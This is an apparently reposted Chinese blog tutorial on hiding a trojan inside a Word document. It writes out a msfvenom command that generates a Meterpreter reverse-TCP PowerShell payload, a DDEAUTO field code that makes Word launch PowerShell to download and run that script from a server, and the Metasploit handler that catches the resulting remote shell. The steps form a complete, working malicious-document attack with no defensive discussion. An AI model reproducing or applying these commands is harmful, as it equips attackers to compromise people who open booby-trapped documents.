码迷,mamicode.com
首页 > 系统相关 > 详细

Powershell配合word伪装木马执行

时间:2021-03-18 14:14:35      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:搭建   client   system   download   bcd   power   load   payload   cmd   

环境:

win7 64位,word2013

生成木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1 

? 技术图片

放到VPS上,这里我们放到本机搭建的apache环境中

? 技术图片

win7中访问木马是否成功

? 技术图片

打开word2013,设置域ctrl+F9

? 技术图片

写入代码:

DDEAUTO C:\\windows\\system32\\cmd.exe "/k powershell IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.3.37/x.ps1‘) "

命令通过powershell执行下载了VPS的x.ps1

监听payload

msf5 > handler -H 192.168.64.135 -P 1122 -p windows/x64/meterpreter/reverse_tcp

? 技术图片

打开word文件,点击是

? 技术图片

在后台弹出cmd

监听成功

? 技术图片

Powershell配合word伪装木马执行

标签:搭建   client   system   download   bcd   power   load   payload   cmd   

原文地址:https://www.cnblogs.com/yyhuni/p/14550647.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!